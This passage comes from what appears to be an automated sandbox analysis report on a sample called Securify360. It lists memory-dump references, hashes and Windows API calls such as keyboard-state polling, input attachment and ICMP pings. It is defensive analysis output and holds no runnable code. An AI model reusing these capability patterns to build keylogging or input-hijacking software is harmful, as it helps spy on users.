                                                                                              • VariantClear.OLEAUT32(?), ref: 00FE78E4
                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00FE78F1
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FE78FA
                                                                                              • VariantClear.OLEAUT32(?), ref: 00FE790C
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FE7917
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                              • String ID:
                                                                                              • API String ID: 2706829360-0
                                                                                              • Opcode ID: 5d6aa8d669619fa7bdc3e144166177827b37fbd07535843937440b896d206ed2
                                                                                              • Instruction ID: 9646fd356407b8808206dfde3759bfb38ac03d124eaece3bb35ec87be8c0656b
                                                                                              • Opcode Fuzzy Hash: 5d6aa8d669619fa7bdc3e144166177827b37fbd07535843937440b896d206ed2
                                                                                              • Instruction Fuzzy Hash: C9418E75A002199FDB10EFA5C8489ADBBB8FF18310F10C069F855A7255CB35AA46DFA0
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 00FF0530
                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00FF05B1
                                                                                              • GetKeyState.USER32(000000A0), ref: 00FF05CC
                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00FF05E6
                                                                                              • GetKeyState.USER32(000000A1), ref: 00FF05FB
                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00FF0613
                                                                                              • GetKeyState.USER32(00000011), ref: 00FF0625
                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00FF063D
                                                                                              • GetKeyState.USER32(00000012), ref: 00FF064F
                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00FF0667
                                                                                              • GetKeyState.USER32(0000005B), ref: 00FF0679
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: State$Async$Keyboard
                                                                                              • String ID:
                                                                                              • API String ID: 541375521-0
                                                                                              • Opcode ID: 9ec224f65744febdc9ef7bb5ef771fc3fb5682fafe5851e54c9460d546c720a1
                                                                                              • Instruction ID: 76bd31658f640cb23505c19d2376d75ea570b9ddb1e281a3234a097e334c39ef
                                                                                              • Opcode Fuzzy Hash: 9ec224f65744febdc9ef7bb5ef771fc3fb5682fafe5851e54c9460d546c720a1
                                                                                              • Instruction Fuzzy Hash: 3F41C530D047CE6DFF308A6484047B6BEA06F51324F0C4059D7C5866D3EEE899D89B96
                                                                                              APIs
                                                                                                • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                                                                • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                                                              • CoInitialize.OLE32 ref: 01008AED
                                                                                              • CoUninitialize.OLE32 ref: 01008AF8
                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,01023BBC,?), ref: 01008B58
                                                                                              • IIDFromString.OLE32(?,?), ref: 01008BCB
                                                                                              • VariantInit.OLEAUT32(?), ref: 01008C65
                                                                                              • VariantClear.OLEAUT32(?), ref: 01008CC6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                              • API String ID: 834269672-1287834457
                                                                                              • Opcode ID: d0bc98d8f3911f7267da8970b50480ce75b6bdd070074e44141da47680d0b653
                                                                                              • Instruction ID: 75a9c35cf223767900b853f128354a24ab5220b0a37fb13da11f62ab898daac3
                                                                                              • Opcode Fuzzy Hash: d0bc98d8f3911f7267da8970b50480ce75b6bdd070074e44141da47680d0b653
                                                                                              • Instruction Fuzzy Hash: EF619F70A047059FE722DF54C884E6EBBE8BF84714F00885EF9C59B291D774E944CB92
                                                                                              APIs
                                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 01005E7E
                                                                                              • inet_addr.WSOCK32(?,?,?), ref: 01005EC3
                                                                                              • gethostbyname.WSOCK32(?), ref: 01005ECF
                                                                                              • IcmpCreateFile.IPHLPAPI ref: 01005EDD
                                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01005F4D
                                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01005F63
                                                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 01005FD8
                                                                                              • WSACleanup.WSOCK32 ref: 01005FDE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                              • String ID: Ping
                                                                                              • API String ID: 1028309954-2246546115
                                                                                              • Opcode ID: 20c5621dcf5dcaeb1d962d375e91a2f1a7fa61fd7ef9accd449bd8c84b298028
                                                                                              • Instruction ID: a55011418f34b877c87169305865100e16edac0ccda4ecb827bad8d83c6ec9c0
                                                                                              • Opcode Fuzzy Hash: 20c5621dcf5dcaeb1d962d375e91a2f1a7fa61fd7ef9accd449bd8c84b298028
                                                                                              • Instruction Fuzzy Hash: 35516D716043019FEB62EF24CC49B2ABBE4AF88710F144569F999DB2D1DB78E800DF42
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00FFBB13
                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00FFBB89
                                                                                              • GetLastError.KERNEL32 ref: 00FFBB93
                                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 00FFBC00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                              • API String ID: 4194297153-14809454
                                                                                              • Opcode ID: 4b6138a81f37c2d03e5e9dd92d97c38f9e9ffbfd9f29d3848ee1775a3ff0cdfd
                                                                                              • Instruction ID: 7b6295e2a907a0156b43aa186bf69af7c5e716d92374f46f0f20298454b0963b
                                                                                              • Opcode Fuzzy Hash: 4b6138a81f37c2d03e5e9dd92d97c38f9e9ffbfd9f29d3848ee1775a3ff0cdfd
                                                                                              • Instruction Fuzzy Hash: 5E31C335A0020DAFCB10EF69C885EB9B7B4FF84314F14806AEB05D72A5DB759901EB50
                                                                                              APIs
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                                • Part of subcall function 00FEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00FEB7BD
                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FE9BCC
                                                                                              • GetDlgCtrlID.USER32 ref: 00FE9BD7
                                                                                              • GetParent.USER32 ref: 00FE9BF3
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FE9BF6
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00FE9BFF
                                                                                              • GetParent.USER32(?), ref: 00FE9C1B
                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FE9C1E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 1536045017-1403004172
                                                                                              • Opcode ID: 294ac41ec4f703411167e92a0870de660e3d205cfff0ae4f4b738e82a21e8e9b
                                                                                              • Instruction ID: efa8bc7b2b7f096b576b750360dd4762f720a2dcac925b7a8315da38b2df046a
                                                                                              • Opcode Fuzzy Hash: 294ac41ec4f703411167e92a0870de660e3d205cfff0ae4f4b738e82a21e8e9b
                                                                                              • Instruction Fuzzy Hash: 3621F774D00204BBCF20AFA5CC85EFEBBB4EF99310F204115F8A197295DB794918AB20
                                                                                              APIs
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                                • Part of subcall function 00FEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00FEB7BD
                                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00FE9CB5
                                                                                              • GetDlgCtrlID.USER32 ref: 00FE9CC0
                                                                                              • GetParent.USER32 ref: 00FE9CDC
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FE9CDF
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00FE9CE8
                                                                                              • GetParent.USER32(?), ref: 00FE9D04
                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FE9D07
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 1536045017-1403004172
                                                                                              • Opcode ID: 6eb05ad744c57c0927c6d0913c7946469d83dd81fba9c3ca7d88c3427e33cbe3
                                                                                              • Instruction ID: 5fe49a8cdef3f447b30c3a1df25a2961aa1db1bb33b697efaa9d7876227b9436
                                                                                              • Opcode Fuzzy Hash: 6eb05ad744c57c0927c6d0913c7946469d83dd81fba9c3ca7d88c3427e33cbe3
                                                                                              • Instruction Fuzzy Hash: AC2106B5E00205BBDF20AF61CC85EFEBBB4EF45300F204015F89197195DB794818AB20
                                                                                              APIs
                                                                                              • GetParent.USER32 ref: 00FE9D27
                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00FE9D3C
                                                                                              • _wcscmp.LIBCMT ref: 00FE9D4E
                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FE9DC9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                              • API String ID: 1704125052-3381328864
                                                                                              • Opcode ID: 588d66407ad4262fa92b83f8cd83ba539537016fd5a424e8a15da7f449a75908
                                                                                              • Instruction ID: c5dffe78875d21b21b8ebffc0d4aab14ed974dc761de542b359e3ccd238ecc90
                                                                                              • Opcode Fuzzy Hash: 588d66407ad4262fa92b83f8cd83ba539537016fd5a424e8a15da7f449a75908
                                                                                              • Instruction Fuzzy Hash: 61113DB768C362BAF6302617EC06DE6739CDB04330B300126F941A5091FFDA591579A0
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 01008FC1
                                                                                              • CoInitialize.OLE32(00000000), ref: 01008FEE
                                                                                              • CoUninitialize.OLE32 ref: 01008FF8
                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 010090F8
                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 01009225
                                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01023BDC), ref: 01009259
                                                                                              • CoGetObject.OLE32(?,00000000,01023BDC,?), ref: 0100927C
                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 0100928F
                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0100930F
                                                                                              • VariantClear.OLEAUT32(?), ref: 0100931F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 2395222682-0
                                                                                              • Opcode ID: 47c6929a7b436fb113bf4e737347c60fb5dc16c61d8c85fb7af2151ca6cb7e61
                                                                                              • Instruction ID: 1f6e941add707d7441c50c9ab00e9ef7016903bb89fe6b2cebe3195c11c0c0a2
                                                                                              • Opcode Fuzzy Hash: 47c6929a7b436fb113bf4e737347c60fb5dc16c61d8c85fb7af2151ca6cb7e61
                                                                                              • Instruction Fuzzy Hash: 25C148712083059FE701DF68C88496BBBE9FF89748F00495DF98A9B292DB71ED05CB52
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00FF19EF
                                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00FF0A67,?,00000001), ref: 00FF1A03
                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00FF1A0A
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FF0A67,?,00000001), ref: 00FF1A19
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FF1A2B
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FF0A67,?,00000001), ref: 00FF1A44
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FF0A67,?,00000001), ref: 00FF1A56
                                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00FF0A67,?,00000001), ref: 00FF1A9B
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FF0A67,?,00000001), ref: 00FF1AB0
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FF0A67,?,00000001), ref: 00FF1ABB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                              • String ID:
                                                                                              • API String ID: 2156557900-0
                                                                                              • Opcode ID: d839d890d8632510ae794feda0af5dd0b61fee18c3fe166b50ff2af16c127162
                                                                                              • Instruction ID: 74df3a9558d808b669410dc1abe0c2681e3eb78df9da32a461d43ccd87b0a2b1
                                                                                              • Opcode Fuzzy Hash: d839d890d8632510ae794feda0af5dd0b61fee18c3fe166b50ff2af16c127162
                                                                                              • Instruction Fuzzy Hash: 2231BF71901308EFEB30DF15D848B7A77AABF58325F20811AFE41C61A9D7BE9D409B60
                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000008), ref: 00F9260D
                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 00F92617
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00F9262C
                                                                                              • GetStockObject.GDI32(00000005), ref: 00F92634
                                                                                              • GetClientRect.USER32(?), ref: 00FCC0FC
                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00FCC113
                                                                                              • GetWindowDC.USER32(?), ref: 00FCC11F
                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 00FCC12E
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00FCC140
                                                                                              • GetSysColor.USER32(00000005), ref: 00FCC15E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3430376129-0
                                                                                              • Opcode ID: e99b40b993a48d7e4c162ac26e46f74d4542eae43800ea03e84a33a359dea203
                                                                                              • Instruction ID: 8c0b2214681eee18c0e0b2c4414fca666be87e01d0d741442fc13f799acc4072
                                                                                              • Opcode Fuzzy Hash: e99b40b993a48d7e4c162ac26e46f74d4542eae43800ea03e84a33a359dea203
                                                                                              • Instruction Fuzzy Hash: C6114C31900305BFEB715FA4ED09FE97BA2EB08331F244265FAA9950E9CB360951EF51
                                                                                              APIs
                                                                                              • EnumChildWindows.USER32(?,00FEB13A), ref: 00FEB078
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChildEnumWindows
                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                              • API String ID: 3555792229-1603158881
                                                                                              • Opcode ID: bd8976e8afeb6f8b009eb7961eaa0291597251d0eac6caf38112140a8474a5cd
                                                                                              • Instruction ID: e7b998ea58ffd1c4157bdafcaa8b9710bff7eca5c4819adb16dd90e5c13120d7
                                                                                              • Opcode Fuzzy Hash: bd8976e8afeb6f8b009eb7961eaa0291597251d0eac6caf38112140a8474a5cd
                                                                                              • Instruction Fuzzy Hash: 4E91C7B1A00186EBCB18EF62C881BEEFB75BF44310F108119E95AA7191DF347959EB91
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00F9327E
                                                                                                • Part of subcall function 00F9218F: GetClientRect.USER32(?,?), ref: 00F921B8
                                                                                                • Part of subcall function 00F9218F: GetWindowRect.USER32(?,?), ref: 00F921F9
                                                                                                • Part of subcall function 00F9218F: ScreenToClient.USER32(?,?), ref: 00F92221
                                                                                              • GetDC.USER32 ref: 00FCD073
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FCD086
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00FCD094
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00FCD0A9
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00FCD0B1
                                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FCD13C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                              • String ID: U
                                                                                              • API String ID: 4009187628-3372436214
                                                                                              • Opcode ID: 9fe3280de276955c1a1aceebc9f3913e1b771cb30591673aac1fe5cc3dd786d4
                                                                                              • Instruction ID: d3c19f8501cbd38a92ca51631c72cb123a531ec0cebf55bfd96ec0b93e82270b
                                                                                              • Opcode Fuzzy Hash: 9fe3280de276955c1a1aceebc9f3913e1b771cb30591673aac1fe5cc3dd786d4
                                                                                              • Instruction Fuzzy Hash: A571C03180020ADFDF218F68C985FAE7BB5FF49320F24426EED955A159C7369942EB60
                                                                                              APIs
                                                                                                • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                                                                • Part of subcall function 00F92714: GetCursorPos.USER32(?), ref: 00F92727
                                                                                                • Part of subcall function 00F92714: ScreenToClient.USER32(010577B0,?), ref: 00F92744
                                                                                                • Part of subcall function 00F92714: GetAsyncKeyState.USER32(00000001), ref: 00F92769
                                                                                                • Part of subcall function 00F92714: GetAsyncKeyState.USER32(00000002), ref: 00F92777
                                                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0101C69C
                                                                                              • ImageList_EndDrag.COMCTL32 ref: 0101C6A2
                                                                                              • ReleaseCapture.USER32 ref: 0101C6A8
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0101C752
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0101C765
                                                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0101C847
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
